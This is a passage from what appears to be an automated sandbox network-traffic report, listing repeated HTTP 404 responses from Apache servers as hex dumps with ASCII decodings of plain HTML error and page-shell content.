72 69 70 74 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:58:33 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 62 6c 75 65 62 69 72 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 74 73 6c 69 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 6f 6d 65 6e 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6c 75 67 69 6e 2f 4c 4f 47 4f 53 65 74 74 69 6e 67 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 61 70 70 5f 34 30 35 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:58:36 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 62 6c 75 65 62 69 72 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 74 73 6c 69 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 6f 6d 65 6e 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6c 75 67 69 6e 2f 4c 4f 47 4f 53 65 74 74 69 6e 67 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 61 70 70 5f 34 30 35 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:58:39 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 62 6c 75 65 62 69 72 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 74 73 6c 69 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 6f 6d 65 6e 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6c 75 67 69 6e 2f 4c 4f 47 4f 53 65 74 74 69 6e 67 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 61 70 70 5f 34 30 35 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:58:58 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:59:00 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:59:03 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:59:05 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:59:12 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 37 39 34 35 36 32 31 37 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.79456217.xyz Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:59:14 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 